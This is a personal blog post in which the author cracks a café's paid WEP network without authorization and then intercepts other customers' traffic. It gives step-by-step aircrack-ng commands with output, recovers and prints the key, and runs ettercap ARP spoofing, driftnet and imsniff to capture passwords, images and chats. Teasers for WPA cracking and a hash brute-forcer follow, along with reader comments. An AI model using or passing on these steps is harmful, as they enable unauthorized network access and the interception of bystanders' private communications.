Coffee Binary Wifi
Hello Guys … today i went to coffee beanery with my laptop indeed
i search for the wireless networks and the nearest one has an essid of “cblink”
its the caffe beanery link anyways it has an WEP encryption WEP cipher
so i went to the women that works here and asked her for the password
she said you have to pay!! i’m like why ?? ^_^ so i just ordered a cold moca
and didn’t pay for the wireless and wanted to crack it .. free internet free community
and free speach LOL..
so lets check it out..
$ iwlist wlan1 scanning Cell 01 - ...etc Cell 02 - Address: 00:12:17:A8:2B:F9 ESSID:"cblink" Mode:Master Channel:11 Frequency:2.462 GHz (Channel 11) Quality=51/100 Signal level:-50 dBm Encryption key:on Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s 48 Mb/s; 54 Mb/s Extra:tsf=000000371cde58ea |
so our target ESSID is “cblink” it access-point is 00:12:17:A8:2B:F9
and its on channel 11 with a WEP enc.
so lets run our card in a monitor mode using airmon-ng
$ airmon-ng start wlan1 11 |
and we got the monitor interface “mon0″
now lets run airodump-ng to capture everything
$ airodump-ng --bssid 00:12:17:A8:2B:F9 --channel 11 --write cblink mon0 CH 11 ][ Elapsed: 9 mins ][ 2008-07-10 23:18 ][ BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:17:A8:2B:F9 206 100 349 90 279 11 54e. WEP WEP OPN cblink BSSID STATION PWR Rate Lost Packets Probe 00:12:17:A8:2B:F9 00:15:70:35:8D:87 192 11-11 20 1167 00:12:17:A8:2B:F9 00:A0:F8:EB:77:13 196 11-11 28 2175 |
and now lets do an fake authentication attack (-1) using aireplay-ng
$ aireplay-ng -1 0 -a 00:12:17:A8:2B:F9 mon0 |
and it will return a success attack results
then lets do the standard ARP-request replay (-3)
$ aireplay-ng -3 -b 00:12:17:A8:2B:F9 -e cblink mon0 |
and wait for few seconds or minutes depends on the wireless signal and other things
then you’ll get something like
Read 585997 packets (got 367035 ARP requests and 187782 ACKs), sent 199637 packets...(499 pps) |
check out the airodump terminal you’ll see something like that
CH 11 ][ Elapsed: 9 mins ][ 2008-07-10 23:18 ][ BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:12:17:A8:2B:F9 206 100 5349 189111 379 11 54e. WEP WEP OPN cblink BSSID STATION PWR Rate Lost Packets Probe 00:12:17:A8:2B:F9 00:15:70:35:8D:87 192 11-11 20 1167 00:12:17:A8:2B:F9 00:A0:F8:EB:77:13 196 11-11 28 2175 00:12:17:A8:2B:F9 00:1C:F0:A0:94:A7 0 0- 0 582445 369975 |
nice so we captured alot of Data and IVs and here’s our STATION 00:1C:F0:A0:94:A7
after doing an fake authentication attack
Mmmm so how about cracking the key ?
$ ls cblink-01.cap cblink-01.txt replay_arp-0710-230918.cap |
use aircrack-ng to crack cblink-01.cap and get the WEP key of our target
$ aircrack-ng cblink-01.cap Opening cblink-01.cap Read 753046 packets. # BSSID ESSID Encryption 1 00:12:17:A8:2B:F9 cblink WEP (189111 IVs) [00:00:00] Tested 877 keys (got 184718 IVs) KB depth byte(vote) 0 0/ 13 5A(251392) 0C(209408) 92(205056) F4(204288) 64(200960) E8(200192) 5C(199424) 59(199168) 1 0/ 1 37(267520) D6(200704) 6F(199680) C8(198656) 06(197888) 18(197376) E4(197376) 50(196864) 2 13/ 2 10(197120) 46(196608) 03(196352) 09(196352) 58(196096) AF(195840) A0(195584) BF(195328) 3 0/ 1 9A(269056) D5(201984) 8F(199168) E3(198656) CE(198144) 18(197376) C6(197376) 46(196608) 4 28/ 4 21(194048) 01(193792) 6E(193792) A2(193792) AB(193792) CE(193792) F2(193536) 23(193280) KEY FOUND! [ 5A:CD:74:E6:09:13:90:60:0F:B8:40:CD:A3 ] Decrypted correctly: 100% |
nice we cracked it successfully and the key is 5A:CD:74:E6:09:13:90:60:0F:B8:40:CD:A3
now lets connect to the wireless
$ airmon stop mon0 $ airmon stop wlan1 $ iwconfig wlan1 essid cblink channel 11 key 5A:CD:74:E6:09:13:90:60:0F:B8:40:CD:A3 ap 00:12:17:A8:2B:F9 $ iwconfig wlan1 wlan1 IEEE 802.11 ESSID:"cblink" Mode:Managed Frequency:2.462 GHz Access Point: 00:12:17:A8:2B:F9 Bit Rate=1 Mb/s Tx-Power=11 dBm Retry min limit:7 RTS thr:off Fragment thr=2352 B Encryption key:5ACD-74E6-0913-9060-0FB8-40CD-A3 Link Quality=71/100 Signal level:-52 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 |
nice ^___^ lets dhcp
$ dhclient3 wlan1 Internet Systems Consortium DHCP Client V3.0.6 Listening on LPF/wlan1/00:1c:f0:a0:94:a7 Sending on LPF/wlan1/00:1c:f0:a0:94:a7 Sending on Socket/fallback DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 6 DHCPOFFER of 191.167.14.106 from 191.167.14.1 DHCPREQUEST of 191.167.14.106 on wlan1 to 255.255.255.255 port 67 DHCPACK of 191.167.14.106 from 191.167.14.1 bound to 191.167.14.106 -- renewal in 36615 seconds. |
connected and the router gave us that ip 191.167.14.106
now lets sniff the network we might find nice things using ettercap
$ ettercap -Tqi wlan1 -P autoadd -M arp:remote -L log.traffic -l log.info -m log.messages -w log.pcap -t all -k log.hosts // // |
start it and wait for things .. but before that make sure to turn off any firewall ex. firestarter
the gui firewall application…
Mmmm thats it now you can do lots of things
you can do a dns_spoof that comes us a plugin for ettercap
you can see passwords
images that transfers in the HTTP using driftnet
$ driftnet -i wlan1 -v -a -d /sniffing/cblink/images -p -s |
you can dump the MSNMS protocol conversations form the log.pcap file that made by ettercap
using a script called msndump.pl search for it on google
or you can use imsniff
$ imsniff -i wlan1 -cd /sniffing/cblink/converstions -vvv -p |
Mmmm just be creative and make what ever you want ^.^
and yes … if you want to sniff MSN users that uses windows and they didn’t connect yet
don’t do it that way… because the new version of msn client that from microsoft msn live
won’t make them connect because of the SSL faking function that ettercap do..
so just crack the wireless
connect to it and use airtun-ng to make another interface with the WEP key
and start sniffing via that interface ex. at0..
that way you’ll be sniffing that traffic with out connecting to the wireless
and with out doing SSL mitm or ARP or any other attacks like half-duplex mitm attacks …
that will prevent some programe from functioning….
bye 
Cracking WPA/WPA2 “airolib-ng”
about 2 years ago - 10 comments
What’s airolib-ng : Airolib-ng is a tool for the aircrack-ng suite to store and manage essid and password lists, compute their Pairwise Master Keys (PMKs) and use them in WPA/WPA2 cracking. for more information checkout http://www.aircrack-ng.org/ … So i was in my friends house and there’s a wireless network in my range and he wouldn’t
The Park
about 2 years ago - 9 comments
Mmmm … i’m bored us always most of my friends isn’t here and i woke up at 7am there’s almost nothing todo at this time here so i went to the park with my laptop i searched for the wireless and i found “iPark” a free wireless that’s running on a Cisco device here’s a
Qcrack v0.25
about 2 years ago - 3 comments
Woow i have just found an old code i wrote it called Qcrack its a programe that calculate/bruteforce: * md5 hashs * md4 hashs * md2 hashs here’s a screenshot: Checkout code->Qcrack->Qcrack-0.25.tar.gz or download it by clicking here A changelot has been made to the code * A new Makefile * Lots of code where
about 1 year ago
Your awesome! Keep Up!!
about 1 year ago
Why do i get this output?
$ imsniff -i wlan0 -cd /****/**** -vvv -p
Wed May 27 15:52:00 2009 | 3 | Getting address and mask for device wlan0…
Wed May 27 15:52:00 2009 | 3 | OK
Wed May 27 15:52:00 2009 | 3 | Opening device…
Wed May 27 15:52:00 2009 | 0 | error [socket: Operation not permitted]
about 1 year ago
Pfff.. Don’t worry about it..
about 1 year ago
Thanks,
The problem you was having is because you don’t have permission to socks, you have to be “root” to use it.
about 1 year ago
Inspiring! =]
about 1 year ago
I think its a great work & it certainly will make many realise that how precious their love is.
about 11 months ago
cool pics
about 5 months ago
Very good site. Continue to keep the good work.|I added the website. Thank you for excellent job!
about 4 months ago
me was here
hello dude
keep it up